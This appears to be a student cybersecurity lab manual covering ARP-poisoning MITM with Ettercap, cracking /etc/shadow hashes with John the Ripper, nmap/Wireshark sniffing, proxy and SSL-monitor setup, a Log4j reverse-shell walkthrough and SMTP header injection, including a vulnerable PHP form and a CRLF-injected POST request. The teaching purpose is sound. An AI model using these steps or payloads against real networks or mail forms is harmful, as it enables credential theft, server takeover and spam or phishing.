Experiment 1

Aim: Man-in-the-Middle Attack (Windows + Linux Client)

Theory: Man in the Middle Attack Techniques

1 Sniffing

Sniffing is a technique that allows attackers to inspect packets at a low level by using packet
capturing tool. Hacker is using a specific wireless device that is allowed to be put into
monitoring or promiscuous mode.

By Now hacker can see packets that are not intended for it to see, such as packets addressed to
other hosts. arp poisoning and mac spoofing is helpful for this technique.

2 Packet Injection

Packet injection is a process to forge packet or spoof packet and interfering within pre-
established communication connection between two parties. These injected packets look the part
of a normal communication stream. It allows an attacker to intercept packets from the
communication data to travel over the network.

An attacker can also leverage their device’s monitoring mode to inject malicious packets into
data communication streams. Packet injection usually involves first sniffing to determine how
and when to craft and send packets.

3 Session Hijacking

When you log in on any web application, this login mechanism create a temporary session token
to use future communication. For Example, Once you log in on facebook, a session token has
been generated. This session token is generated for future communication.

If a hacker steals this session token, he is able to get access to your Facebook account.

An attacker can sniff sensitive traffic to identify the session token for a user and use it to make
requests as the user. The attacker does not need to spoof once he has a session token.

4 SL Stripping

Since using HTTPS is a common safeguard against ARP or DNS spoofing, attackers use SSL
stripping to intercept packets and alter their HTTPS-based address requests to go to their HTTP
equivalent endpoint, forcing the host to make requests to the server unencrypted. Sensitive
information can be leaked in plain text.

What is the Man in the middle attack tools

There are lots of tools are available in the market for Man in the middle attack. Some for
windows and some for Linux. Most of the tools are available for Linux. If you are using Kali
Linux operating system, you will get all required tools pre-installed.

Some tools are described below.

Tool 1- Ettercap:

Ettercap is a comprehensive suite for Man in the Middle Attack. It preinstalled in most of
Cybersecurity operating system including Kali Linux, Parrot OS, Black Arch, Blackbox, etc. It
has all the required feature and attacking tools used in MITM, for example, ARP poisoning,
sniffing, capturing data, etc.

Tool 2- TCP Dump:

TCPdump is a command-line tool and a powerful packet analyzer. It helps an attacker to dump
TCP packets during the transmission over the network. But this single tool can not perform the
MITM. you must use one of the arp spoofing tools for arp poisoning and other for routing traffic
incoming as well as outgoing.

Tool 3- WireShark

Wireshark: It is one of the popular and useful tools for a network security researcher. It has a
graphical interface with multiple data filtering capacities. This is one of the best hacker tools.
But this single tool can not perform MITM you must use arp poisoning and traffice routing with
the help of other tools.

Kali Linux Man in the Middle Attack with Ettercap

Victim 1:

Hardware: Virtual Machine

Operating System: Window 7

IP Address: 192.168.56.1

MAC Address. 08:00:27:00:04:93

Victim 2:

Hardware: Virtual Machine

Operating System: Windows XP

IP Address: 192.168.56.102
MAC Address: 08:00:27:79:2C:92

Attacker:

Hardware: Virtual Machine

Operating System: Kali Linux

IP Address: 192.168.56.101

MAC Address 08:00:27:4D: 3A: BA

Step 1: On the Kali Linux ettercap is installed by default, To open it, Go into

Application > Sniffing & Spoofing > ettercap-graphical

Step 2: Go Next Sniff > Unified Sniffing OR Pres Shift+U

Another window will be pop up where you need to select Network interface from the drop-down
menu and click next

Next, Go to Hosts > Scan for hosts

In this option, Atacker system will scan the whole network and find out, “how many devices are
connected to the network?”

Next step, To See the connected hosts in the network

Go Hosts > Host list or Press Key H

Next tab will appear, In this menu you should select the desired host and click on add to target 1,
afterward select another host and click on add to target 2
Next, Go into Mitm > Arp poisoning after click on this option new window will be pop up check
sniff remote connection and it OK. arp poisoning will start automatic

Now you can sniff data by click on Start > Start Sniffing or Ctrl+W

When you finished all process, then sniffing will be started. If you want to check arp poisoning is
activated or not Go Plugins > Manage the plugins OR Ctrl+P

And click on chk_poison You will see a result like the following image.

When user will access any page and enter the login credential, It will be captured by attacker
machine see result.
Experiment 2
Aim: Experimenting with password cracking utilities, attempting dictionary, hybrid, and brute-
force attacks.
Theory: Man in the Middle Attack Techniques

Password Storage In Kali Linux Operating System

Passwords are used to protect the system from an unauthorized access.

Computers with Kali Linux operating system stores password in /etc/shadow file
in the form of Message Digest 5(MD5)/ Blowfish/ Secure Hash Algorithm (SHA-256/ SHA-512)
hash.

Passwords are stored in the form of hash due to its irreversible property. This means that
password in plaintext can be converted to hash but a hash can’t be converted back to plaintext.

PASSWORD CRACKING

Password cracking in Kali Linux operating system is a process to recover passwords from a
shadow file.

The purpose of password cracking is to recover forgotten password. The forensic team can
perform password cracking on a computer system to recover the data after getting the password.

This is usually accomplished by recovering the passwords from data stored in the shadow file in
the form of a hash value.

PASSWORD CRACKING TECHNIQUES

The password cracking techniques are discussed as follows:

BRUTE FORCE: A brute force technique is an attempt to crack passwords using

permutation and combination approach. This method takes a lot of time and
memory consumption depending on the length and complexity of password.

DICTIONARY: A dictionary technique is an attempt to store in-build passwords in a file known

as dictionary. Instead of trying all combination of passwords, it creates a word-list of most
common passwords and calculates the hash values while cracking the passwords. It will only
able to crack the password if it is stored in dictionary file. This technique takes less time as
compared to brute-force technique to crack the password.

RAINBOW TABLES: This technique is same as dictionary, but instead of calculating hash vales
during password cracking; it stores the in-built hash values of password in the tables. Thus, this
technique takes less time as compared to brute-force and dictionary technique to crack the
password.
JOHN-THE-RIPPER TOOL

The John-the-ripper tool [2] is an open-source application and post-exploitation Kali Linux
operating system tool that allows users to view authentication credentials.

This tool provides hashes from shadow file of Kali Linux operating system to users.

Kali Linux store password data in a shadow file in the form of a hash. The forensics team can
use John-the-ripper tool to get the password in plain text and pass it to the target computer to
login.

PASSWORD CRACKING WITH JOHN-THE-RIPPER TOOL

The password in plaintext from hash can be recovered with John-the-ripper tool with the
following steps:

Step 1: Open Kali Linux operating system as shown in Figure 1.

Step 2: In Kali Linux operating system, open John-the-ripper tool. Go to Applications->

Password attacks-> john as shown in Figure 2.

Figure 2: Opening John-the-Ripper tool

Step 3: A terminal with usage of John-the-ripper tool will open as shown in Figure 3 and Figure
4.
Figure 3: John-the-Ripper tool in Terminal

Step 4: Search the password wordlist by browsing Google search engine as shown in Figure 5.
Open the GitHub website and download the ZIP file as shown in Figure 6.

Figure 4: John-the-Ripper tool in Terminal

Figure 5: Search password wordlist

Figure 6: Download password wordlist

Step 5: Save and open the downloaded file as shown in Figure 7. Open the “Real-Passwords”
folder to see the passwords wordlist as shown in Figure 8.

Figure 7: Password folder in downloaded file

Figure 8: Password wordlist

Step 6: Open any password wordlist (e.g., Top12Thousand- probable-v2.txt file) as shown in

Figure 9. Copy this file in Home directory and rename as “wordlist.txt” as shown in Figure 10.

Figure 10: Wordlist file in Home directory

Step 7: Add new users in kali Linux operating system as shown in Figure 11, Figure 12, and
Figure 13. Set a password and press ‘Y’ while creating new users.

Step 8: Go to Other Locations->Computer->etc folder to find the shadow file as shown in Figure
14, Figure 15, and Figure 16.
Figure 14: Opening other locations in Kali Linux operating system

Figure 15: Opening etc folder in Kali Linux operating system

Figure 16: Finding Shadow file

Step 9: Copy the shadow file and paste in Home directory as shown in Figure 17.

Figure 17: Copy of Shadow file and Wordlist in Home directory

Step 9: Rename the shadow file as shadow1 and open the file to find the usernames and
password in the form of hash values as shown in Figure 18 and Figure 19.
Figure 18: Opening Shadow file

Figure 19: Opening Shadow file

Step 10: Write the command “john --wordlist=/root/ wordlist.txt” to recover the hash of root and
“john --show shadow1” to display the passwords in plaintext as shown in Figure 20.
Figure 20: Cracking password of Root

Step 10: Write the command “john --wordlist=

/root/wordlist.txt --format=sha512crypt” to recover the hash of other users and “john --show
shadow1” to display the passwords in plaintext as shown in Figure 21.

The passwords in plaintext are displayed in the Figure 21 and highlighted in red rectangular box.
Figure 21: Cracking password of other users

Experiment 3
Aim: Researching System Vulnerabilities (Internet - access CVE database of vulnerabilities)
Theory: Add Vulnerability of windows XP and 7 operating system with CVE and exploitation
details

Experiment 4
Aim: Intercepting and Sniffing Network Traffic using nmap.
Theory:

For Kali – Netdiscover is an active/passive address reconnaissance tool, mainly developed for
those wireless networks without dhcp server. It can also be used at hub/switch networks.

What are the different techniques used to identify and sniff packets using nmap and
Wireshark?
Arp Scan

An Arp–scan is a low-level network discovery tool used to associate physical (MAC) addresses
to logical (IP) addresses. It’s used to identify network assets that may not normally be captured
by network scanning devices. When assessing a system, we want to be able to identify
vulnerabilities, the first thing we can do is recon Nmap allows us to identify different hosts on a
network and different services the devices are running Arp scans will allow us to identify the
state of a device and sniff packets from the host machine. This allows us to see who is the sender
and who is the receiver

TCP Half Open

One of the more common and popular port scanning techniques is the TCP half-open port scan,
sometimes referred to as an SYN scan. It’s a fast and sneaky scan that tries to find potential open
ports on the target computer.
SYN packets request a response from a computer, and an ACK packet is a response. In a typical
TCP transaction, there is an SYN, an ACK from the service, and a third ACK confirming
message is received.

This scan is fast and hard to detect because it never completes the full TCP 3 way-handshake.
The scanner sends an SYN message and just notes the SYN-ACK responses. The scanner
doesn’t complete the connection by sending the final ACK: it leaves the target hanging.

Any SYN-ACK responses are possibly open ports. An RST(reset) response means the port is
closed, but there is a live computer here. No responses indicate SYN is filtered on the network.
An ICMP (or ping) no response also counts as a filtered response.

What does a TCP Half Open scan look like in Terminal and on Wireshark?

TCP Three-Way Handshake

THREE-WAY HANDSHAKE or a TCP 3-way handshake is a process that is used in a TCP/IP

network to make a connection between the server and client. It is a three-step process that
requires both the client and server to exchange synchronization and acknowledgment packets
before the real data communication process starts.

The three-way handshake process is designed in such a way that both ends help you to initiate,
negotiate, and separate TCP socket connections at the same time. It allows you to transfer
multiple TCP socket connections in both directions at the same time.

Experiment 5
Aim: Intercepting and Sniffing Network Traffic using nmap.
Theory:
Capturing data packets on Wireshark

When you open Wireshark, you see a screen showing you a list of all the network connections
you can monitor. You also have a capture filter field to only capture the network traffic you want
to see.

You can select one or more of the network interfaces using shift+left-click. Once select the
network interface, you can start the capture, and there are several ways to do that.

Click the first button on the toolbar, titled “Start capturing packets.”

You can select the menu item Capture -> Start.

Or you could use the keystroke Control+E.

During the capture, Wireshark will show you the packets captured in real-time.

Once you have captured all the packets needed, use the same buttons or menu options to stop the
capture as you did to begin.

Best practice dictates stopping Wireshark’s packet capture before analysis.

Analyzing data packets on Wireshark

Wireshark shows you three different panes for inspecting packet data. The Packet List, the top
pane, lists all the packets in the capture. When you click on a packet, the other two panes change
to show you the details about the selected packet. You can also tell if the packet is part of a
conversation. Here are details about each column in the top pane:

 No.: This is the number order of the packet captured. The bracket indicates that this
packet is part of a conversation.

 Time: This column shows how long after you started the capture this particular packet
was captured. You can change this value in the Settings menu to display a different
option.

 Source: This is the address of the system that sent the packet.

 Destination: This is the address of the packet destination.

 Protocol: This is the type of packet. For example: TCP, DNS, DHCPv6, or ARP.

 Length: This column shows you the packet’s length, measured in bytes.

 Info: This column shows you more information about the packet contents, which will
vary depending on the type of packet.

Packet Details, the middle pane, shows you as much readable information about the packet as
possible, depending on the packet type. You can right-click and create filters based on the
highlighted text in this field.

The bottom pane, Packet Bytes, displays the packet exactly as it was captured in hexadecimal.

When looking at a packet that is part of a conversation, you can right-click the packet and select
Follow to see only the packets that are part of that conversation.

Wireshark filters

Some of the best features of Wireshark are the capture filters and display filters. Filters allow
you to view the capture the way you need to see it to troubleshoot the issues at hand. Below are
several filters to get you started.

Wireshark capture filters

Capture filters limit the captured packets by the chosen filter. If the packets don’t match the
filter, Wireshark won’t save them. Examples of capture filters include:

host IP-address: This filter limits the captured traffic to and from the IP address
net 192.168.0.0/24: This filter captures all traffic on the subnet

dst host IP-address: Capture packets sent to the specified host

port 53: Capture traffic on port 53 only

port not 53 and not arp: Capture all traffic except DNS and ARP traffic

Wireshark display filters

Wireshark display filters change the view of the capture during analysis. After you’ve stopped
the packet capture, use display filters to narrow down the packets in the Packet List to
troubleshoot your issue.

One of the most useful display filters is:

ip.src==IP-address and ip.dst==IP-address

This filter shows packets sent from one computer (ip.src) to another (ip.dst). You can also use
ip.addr to show packets to and from that IP. Other filters include:

tcp.port eq 25: This filter will show you all traffic on port 25, which is usually SMTP traffic

icmp: This filter will show you only ICMP traffic in the capture, most likely they are pings

ip.addr != IP_address: This filter shows you all traffic except the traffic to or from the specified
computer

Analysts even build filters to detect specific attacks, like this filter used to detect the Sasser
worm:

ls_ads.opnum==0x09

Additional Wireshark features

Beyond the capture and filtering, several other features in Wireshark can make your job easier.

Wireshark colorization options

You can configure Wireshark to color your packets in the Packet List according to the display
filter, which allows you to emphasize the packets you want to highlight. Check out some
examples here.

Wireshark promiscuous mode

By default, Wireshark only captures packets going to and from the computer where it runs. By
checking the box to run Wireshark in promiscuous mode in the capture settings, you can capture
most of the traffic on the LAN.
Wireshark command line
Wireshark does provide a command line interface (CLI) if you operate a system without a
graphical user interface (GUI). The best practice would be to use the CLI to capture and save a
log so you can review the log with the GUI.

Wireshark commands

 wireshark : run Wireshark in GUI mode

 wireshark –h : show available command line parameters for Wireshark

 wireshark –a duration:300 –i eth1 –w wireshark. : capture traffic on the ethernet interface

one for five minutes. –a means automatically stop the capture, -i specifies which interface
to capture
Metrics and statistics

Under the Statistics menu, you’ll find a plethora of options to view details about your capture.

Capture File Properties:

Wireshark I/O Graph:
Experiment 6
Aim: Configure a Proxy in Linux
Theory:

You configure global HTTP and HTTPS proxies in the /etc/profile.d/ directory of Cumulus Linux.
Set the http_proxy and https_proxy variables to configure the switch with the address of the proxy
server you want to use to get URLs on the command line. This is useful for programs such
as apt, apt-get, curl and wget, which can all use this proxy.

1. In a terminal, create a new file in the /etc/profile.d/ directory.

cumulus@switch:~$ sudo nano /etc/profile.d/proxy.sh

2. Add a line to the file to configure either an HTTP or an HTTPS proxy, or both:
 HTTP proxy:

http_proxy=http://myproxy.domain.com:8080
export http_proxy

 HTTPS proxy:

https_proxy=https://myproxy.domain.com:8080
export https_proxy

3. Create a file in the /etc/apt/apt.conf.d directory and add the following lines to the file to get
the HTTP and HTTPS proxies. The example below uses http_proxy as the file name:

cumulus@switch:~$ sudo nano /etc/apt/apt.conf.d/http_proxy

Acquire::http::Proxy "http://myproxy.domain.com:8080";
Acquire::https::Proxy "https://myproxy.domain.com:8080";

4. Add the proxy addresses to the /etc/wgetrc file, then uncomment

the http_proxy and https_proxy lines, if necessary:

cumulus@switch:~$ sudo nano /etc/wgetrc

...
https_proxy = https://myproxy.domain.com:8080
http_proxy = http://myproxy.domain.com:8080
...
 5. To execute the /etc/profile.d/proxy.sh file in the current environment, run
the source command:

cumulus@switch:~$ source /etc/profile.d/proxy.sh

Use the echo command to confirm the configuration:

 HTTP proxy:

cumulus@switch:~$ echo $http_proxy

http://myproxy.domain.com:8080

 HTTPS proxy:

cumulus@switch:~$ echo $https_proxy

https://myproxy.domain.com:8080
Experiment 7
Aim: Create a Monitoring System using Certificates and SSL
Theory:
Adding and editing an SSL Certificate monitor in WhatsUp Gold
This monitor checks a specific location for the existence of a valid SSL certificate. The monitor
reports as down if the URL cannot be resolved, if the location cannot be accessed, or in cases
where the monitor is configured to use the URL or the IP address of the configured interface,
an SSL certificate is not found at all.

To add a new SSL Certificate active monitor:

1. From the WhatsUp Gold Web interface, go to Settings > Libraries > Monitors. The
Monitor Library dialog appears.

2. Click the Active tab. The Active Monitor list appears.

3. Click New. The Select Active Monitor Type dialog appears.

4. Select SSL Certificate Monitor, then click OK. The Add SSL Certificate Monitor
dialog appears.

5. Enter the appropriate information:

 Name. Enter a unique name for the active monitor. This name displays in the
Active Monitor Library.

 Description. Enter additional information about the monitor. This description

displays next to the monitor in the Active Monitor Library.

6. Select the method by which the monitor should locate the SSL certificate:

 Check certificate by URL. Enter the URL where the monitor should look for a
certificate. The URL must begin with a proper URI, such as http:// or https://.
Additionally, this field supports appending the URL with a custom port number.
Port 443 is used by default, however, you can specify an alternate port number as
well. For example, to use Port 8081, use the following
format: https://www.<domain>.com:8081.

 Check certificate by file. Enter the shared network location of the certificate in
UNC format. The monitor searches for and uses credentials tied to the target
device. The device must have valid Windows credentials and you must have
proper permissions to access the network share as configured.
 Note: Both methods support the percent
variables %device.hostname and %device.address.

7. Enable the following additional configuration options, if desired:

 Down if certificate expires in the next X days. Specify the number of days for
the monitor to consider. The monitor reports the target device as down if
the SSL certificate is set to expire within the number of days entered.

 Check certificate usage (verifies the Common Name matches the URL
domain). Select this option to configure the monitor to check that the common
name on the SSL certificate matches the domain on the URL.

8. Enable and configure the following additional proxy settings, if desired:

 Proxy server. Enter the address of the required proxy server if needed to access
the configured URL. This option is not valid for Path to File.

 Proxy port. Enter the port on which the proxy server listens.

 Proxy username. If required, enter the username for the proxy server.

 Proxy password. Enter the password that coincides with the username for the
proxy server.

 Timeout (seconds). Enter the length of time WhatsUp Gold attempts to connect.
When the time you enter is exceeded without connecting, a timeout occurs and
WhatsUp Gold stops trying to connect. This is considered a failed connection.
This option is not valid for Path to File.

9. Check Use in Rescan to have the monitor appear in the Active Monitor list on the Device
Properties dialog. WhatsUp Gold adds the monitor type to the device during a rescan,
which is launched using the Rescan button on the Device Properties dialog, if the
protocol or service is active on the device.

Important: The Use in Rescan control only applies if

the %device.address or %device.hostname percent variable is used in the either the Check
certificate by URL or Check certificate by file configuration fields.

10. Click OK to save changes.

To edit an existing SSL Certificate active monitor:

1. From the WhatsUp Gold Web interface, go to Settings > Libraries > Monitors. The
Monitor Library dialog appears.
 2. Click the Active tab. The Active Monitor list appears.

3. Select the target SSL Certificate monitor.

4. Click Edit. The Edit SSL Certificate Monitor dialog appears.

5. Modify the configuration settings described previously as needed.

6. Click OK to save changes.

Adding and editing an SSL Certificate monitor in WhatsUp Gold v16 (2016)
This monitor checks a specific location for the existence of a valid SSL certificate. The monitor
reports as down if the URL cannot be resolved, if the location cannot be accessed, or in cases
where the monitor is configured to use the URL or the IP address of the configured interface,
an SSL certificate is not found at all.

To add a new SSL Certificate active monitor:

1. From the WhatsUp Gold web interface, go to Admin > Monitors. The Monitor Library
dialog appears.

2. Click the Active tab. The Active Monitor list appears.

3. Click New. The Select Active Monitor Type dialog appears.

4. Select SSL Certificate Monitor, then click OK. The Add SSL Certificate Monitor
dialog appears.

5. Enter the appropriate information:

 Name. Enter a unique name for the active monitor. This name displays in the
Active Monitor Library.

 Description. Enter additional information about the monitor. This description

displays next to the monitor in the Active Monitor Library.

6. Select the method by which the monitor should locate the SSL certificate:

 Check certificate by URL. Enter the URL where the monitor should look for a
certificate. The URL must begin with a proper URI, such as http:// or https://.
Additionally, this field supports appending the URL with a custom port number.
Port 443 is used by default, however, you can specify an alternate port number as
well. For example, to use Port 8081, use the following
format: https://www.<domain>.com:8081.
  Check certificate by file. Enter the shared network location of the certificate in
UNC format. The monitor searches for and uses credentials tied to the target
device. The device must have valid Windows credentials and you must have
proper permissions to access the network share as configured.

Note: Both methods support the percent

variables %device.hostname and %device.address.

7. Enable the following additional configuration options, if desired:

 Down if certificate expires in the next X days. Specify the number of days for
the monitor to consider. The monitor reports the target device as down if
the SSL certificate is set to expire within the number of days entered.

 Check certificate usage (verifies the Common Name matches the URL
domain). Select this option to configure the monitor to check that the common
name on the SSL certificate matches the domain on the URL.

8. Enable and configure the following additional proxy settings, if desired:

 Proxy server. Enter the address of the required proxy server if needed to access
the configured URL. This option is not valid for Path to File.

 Proxy port. Enter the port on which the proxy server listens.

 Proxy username. If required, enter the username for the proxy server.

 Proxy password. Enter the password that coincides with the username for the
proxy server.

 Timeout (seconds). Enter the length of time WhatsUp Gold attempts to connect.
When the time you enter is exceeded without connecting, a timeout occurs and
WhatsUp Gold stops trying to connect. This is considered a failed connection.
This option is not valid for Path to File.

9. Check Use in Rescan to have the monitor appear in the Active Monitor list on the Device
Properties dialog. WhatsUp Gold adds the monitor type to the device during a rescan,
which is launched using the Rescan button on the Device Properties dialog, if the
protocol or service is active on the device.

Important: The Use in Rescan control only applies if

the %device.address or %device.hostname percent variable is used in the either the Check
certificate by URL or Check certificate by file configuration fields.

10. Click OK to save changes.

To edit an existing SSL Certificate active monitor:

1. From the WhatsUp Gold web interface, go to Admin > Monitors. The Monitor Library
dialog appears.

2. Click the Active tab. The Active Monitor list appears.

3. Select the target SSL Certificate monitor.

4. Click Edit. The Edit SSL Certificate Monitor dialog appears.

5. Modify the configuration settings described previously as needed.

6. Click OK to save changes.

Experiment 8
Aim: Demonstration of Web Server Exploits
Theory:

This critical vulnerability, labeled CVE-2021-44228, affects a large number of customers, as the
Apache Log4j component is widely used in both commercial and open source software. In
addition, ransomware attackers are weaponizing the Log4j exploit to increase their reach to more
victims across the globe.

Our demonstration is provided for educational purposes to a more technical audience with the
goal of providing more awareness around how this exploit works. Raxis believes that a better
understanding of the composition of exploits it the best way for users to learn how to combat the
growing threats on the internet.

LOG4J EXPLOIT STORYBOARD

The Apache Log4j vulnerability, CVE-2021-44228, affects a large number of systems, and
attackers are currently exploiting this vulnerability for internet-connected systems across the
world. To demonstrate the anatomy of such an attack, Raxis provides a step-by-step
demonstration of the exploit in action. Within our demonstration, we make assumptions about
the network environment used for the victim server that would allow this attack to take place.
There are certainly many ways to prevent this attack from succeeding, such as using more secure
firewall configurations or other advanced network security devices, however we selected a
common “default” security configuration for purposes of demonstrating this attack.

VICTIM SERVER

First, our victim server is a Tomcat 8 web server that uses a vulnerable version of Apache Log4j
and is configured and installed within a docker container. The docker container allows us to
demonstrate a separate environment for the victim server that is isolated from our test
environment. Our Tomcat server is hosting a sample website obtainable
from https://github.com/cyberxml/log4j-poc and is configured to expose port 8080 for the
vulnerable web server. No other inbound ports for this docker container are exposed other than
8080. The docker container does permit outbound traffic, similar to the default configuration of
many server networks.

Note, this particular GitHub repository also featured a built-in version of the Log4j attack code
and payload, however, we disabled it for our example in order to provide a view into the screens
as seen by an attacker. We are only using the Tomcat 8 web server portions, as shown in the
screenshot below.
Next, we need to setup the attacker’s workstation. Using exploit code
from https://github.com/kozmer/log4j-shell-poc, Raxis configures three terminal sessions, called
Netcat Listener, Python Web Server, and Exploit, as shown below.

NETCAT LISTENER, PORT 9001

The Netcat Listener session, indicated in Figure 2, is a Netcat listener running on port 9001. This
session is to catch the shell that will be passed to us from the victim server via the exploit.

PYTHON WEB SERVER, PORT 80

The Python Web Server session in Figure 3 is a Python web server running on port 80 to
distribute the payload to the victim server.

EXPLOIT CODE, PORT 1389

The Exploit session, shown in Figure 4, is the proof-of-concept Log4j exploit code operating on
port 1389, creating a weaponized LDAP server. This code will redirect the victim server to
download and execute a Java class that is obtained from our Python Web Server running on port
80 above. The Java class is configured to spawn a shell to port 9001, which is our Netcat listener
in Figure 2.
EXECUTE THE ATTACK

Now that the code is staged, it’s time to execute our attack. We’ll connect to the victim
webserver using a Chrome web browser. Our attack string, shown in Figure 5, exploits JNDI to
make an LDAP query to the Attacker’s Exploit session running on port 1389.
The attack string exploits a vulnerability in Log4j and requests that a lookup be performed
against the attacker’s weaponized LDAP server. To do this, an outbound request is made from
the victim server to the attacker’s system on port 1389. The Exploit session in Figure 6 indicates
the receipt of the inbound LDAP connection and redirection made to our Attacker’s Python Web
Server.

The Exploit session has sent a redirect to our Python Web Server, which is serving up a
weaponized Java class that contains code to open up a shell. This Java class was actually
configured from our Exploit session and is only being served on port 80 by the Python Web
Server. The connection log is show in Figure 7 below.

The last step in our attack is where Raxis obtains the shell with control of the victim’s
server. The Java class sent to our victim contained code that opened a remote shell to our
attacker’s netcat session, as shown in Figure 8. The attacker now has full control of the Tomcat 8
server, although limited to the docker session that we had configured in this test scenario.
Experiment 9
Aim: Demonstration of E-mail System Exploits
Theory:

How SMTP works

To understand SMTP header injection, we need to start by looking at SMTP – the Simple Mail
Transfer Protocol.

SMTP is one of the oldest protocols of the Internet, first defined in 1981 in RFC 788. Initially, it
accepted a small set of commands that declared the email sender and recipients. As email
communication became more complex over time, additional headers were added.

The first crucial SMTP concept is the difference between the envelope and the email body. The
envelope is the initial part of the communication and is defined by the SMTP protocol itself. The
following commands make up the envelope:

MAIL FROM: Sets the envelope sender.

RCPT TO: Sets the envelope recipient. This command can be used multiple times if you are
sending a message to multiple addresses.

DATA: Begins the email payload, which consists of email headers and the message body,
separated by a single empty line. The message is terminated by sending a line that contains a
period (.) only.

The email headers are not part of the SMTP protocol. They are interpreted by mail clients (to
display the email correctly) and by dedicated email libraries available in various programming
languages. The two most common headers are:

From: This header sets the visible sender, which can be a different address than set using the
MAIL FROM command. In most email clients, the sender information obtained from the MAIL
FROM command is placed in the Return-Path header, which is hidden by default from the user.

To: This header sets the visible recipient, which can differ from the address set using RCPT TO.
In most email clients, the recipient information from the RCPT TO command is placed in the
Delivered-To header, which is hidden by default from the user.
Here is an example of a simple SMTP dialogue (> = sent, < = received):

> MAIL FROM:<[email protected]>

< 250 OK

> RCPT TO:<[email protected]>

< 250 OK

> RCPT TO:<[email protected]>

< 250 OK

> DATA

< 354 Send message content; end with <CRLF>.<CRLF>

> Content-Type: text/html

> Date: Wed, 25 Dec 2019 00:00:01

> From: Santa Claus <[email protected]>

> Subject: Your Gifts Are Here

> To: Not Naughty <[email protected]>

>

> Hello!

> Your gifts are here, <a href="https://malicioushackersdomain.com/">come to the tree</a>!

> --

> Santa

>.

< 250 OK

The above email from [email protected] would be received by [email protected] and

[email protected]. However, to the users, it would appear that the message was sent by
Santa Claus <[email protected]> (not [email protected]). Instead of their own
address, they would also see that the recipient is Not Naughty <[email protected]>.
Unless Anna and Barbara manually open email headers in their email client, they would not see
the true sender at all.

How email injection works

Email injection works by inserting newline characters into user input. If the input is not
sanitized, a malicious hacker can add email headers or modify the body of the message. By
ending their malicious payload with a line that contains only a period, attackers can signal the
end of the message, tricking the email server into disregarding any legitimate content that the
back-end script is meant to send.

Most email libraries in web programming languages will not let you add envelope commands
directly. Instead, they take the email headers you supply and often convert them into equivalent
SMTP commands. For example, if you add a BCC header, your email library may take the
header content and create additional RCPT TO commands. If an attacker is able to add email
headers using that specific library, the headers will be converted into equivalent SMTP
commands.

Example of an email injection attack

The following PHP example is a typical contact form (contact.php) vulnerable to email header
injection. It takes the name and email address directly from the input fields and prepares a list of
headers for the email.

<?php

if(isset($_POST['name'])) {

$name = $_POST['name'];

$replyto = $_POST['replyTo'];

$message = $_POST['message'];

$to = 'root@localhost';
$subject = 'My Subject';

// Set SMTP headers

$headers = "From: $name \n" .

"Reply-To: $replyto";

mail($to, $subject, $message, $headers);

?>

A non-malicious POST request submitted by a user would be as follows:

POST /contact.php HTTP/1.1

Host: www.example2.com

name=Anna Smith&[email protected]&message=Hello

An attacker could abuse this contact form and inject email data by sending the following POST
request:

POST /contact.php HTTP/1.1

Host: www.example2.com

name=Best Product\r\nbcc:
[email protected]&[email protected]&message=Buy my product!

The attacker inserts a newline (\r\n –carriage return and line feed, CRLF) and appends a BCC
header containing additional email addresses. The email library converts these addresses into
RCPT TO commands and delivers the message not only to the intended recipient but also to
these extra addresses. This attack also involves spoofing a replyTo header to make the recipient
believe the email came from someone else ([email protected]).

Potential consequences of an email injection attack

Email injection vulnerabilities are considered a severe cybersecurity issue. While they are not
directly harmful to the web application that has the security vulnerability or to its web server,
email injections can allow attackers to send emails with arbitrary content to arbitrary recipients
in a wide variety of attacks.

The most common email injection attack vectors include:

Spam: A malicious user could use email injection to send spam messages. One line of code with
a successful email injection could allow them to force the victim’s email server to send multiple
emails with the same content to many recipients.

Phishing: An attacker could send phishing email messages that appear to originate from the
victim’s mail server, domain, and IP. As such, the attacker would be untraceable, and the blame
would lie with the victim. If the victim’s application also has a cross-site scripting (XSS)
vulnerability and the links in the phishing email point to this vulnerable application, the email
appears even more legitimate.

Spear phishing: Going a step further, attackers could send legitimate-looking spear-phishing
email messages to selected employees at the company that runs the vulnerable application. For
example, they could send the financial department a convincing email that appears to come from
the CFO and urgently asks for a large bank transfer to the attacker’s account.

How to detect email injection vulnerabilities?

The best way to detect email injection vulnerabilities depends on whether they are already
known or unknown.

If you only use commercial or open-source software and do not develop software of your own, it
may be enough to identify the exact version of the system or application you are using. If the
identified version is susceptible to email injection, you can assume that your software is
vulnerable. You can identify the version manually or use a suitable security tool, such as a
software composition analysis (SCA) solution for web applications or a network scanner for
networked systems and applications.

If you develop your own software or want the ability to potentially find previously unknown
email injection vulnerabilities (zero-days) in known applications, you must be able to
successfully exploit the email injection vulnerability to be certain that it exists. This requires
either performing manual penetration testing with the help of security researchers or using a
vulnerability scanner tool that can automatically exploit web vulnerabilities. Examples of such
tools are Invicti and Acunetix by Invicti. We recommend using this method even for known
vulnerabilities.

Note that email injection is an out-of-band vulnerability, meaning that the attacker does not
receive a direct response to their actions. To detect out-of-band vulnerabilities automatically, the
vulnerability scanner needs an intermediary service. Invicti products use dedicated intermediary
services to detect out-of-band vulnerabilities, including email header injections.

How to prevent email injection vulnerabilities?

To prevent email injection, developers should follow the application security best practice of
treating all user input as untrusted and sanitizing it using input filtration and/or output encoding.
This advice applies not just to email injection but also to most other web security vulnerabilities,
including cross-site scripting, HTML injection, and SQL injection. The recommended practices
for email injection are:

Ensure that your code never directly uses content supplied by the user when specifying command
parameters for functions used to send email, such as mail() in PHP.

Automatically sanitize user input and remove all newline characters before passing content to
mail functions. For input validation, use a whitelist of allowed characters and remove any that
are not on the list.

Encode all data passed to mail functions. This will scramble any CR and LF codes that attackers
attempt to inject.

How to mitigate email injection attacks?

You can mitigate email injection attacks on several levels, even if email header injection
vulnerabilities exist in your web applications:

Mitigation at the development environment level: Allow your programmers to use only safe
development environments, libraries, and functions. Some email libraries are naturally resistant
to email injection. For example, SMTPLIB in Python is safe because SMTP.sendmail() requires
you to specify an explicit list of recipients. If an attacker adds headers, it will only change the
way the email appears.

Mitigation at the web server level: Completely block unsafe email functions and create a safe
email API that your developers are required to use. For example, you can disable the unsafe PHP
mail() function using the disable_functions directive in php.ini. Another option is to completely
block server-side email functionality and require your developers to send emails through
specialized services, like AWS Amazon Simple Email Service (SES).

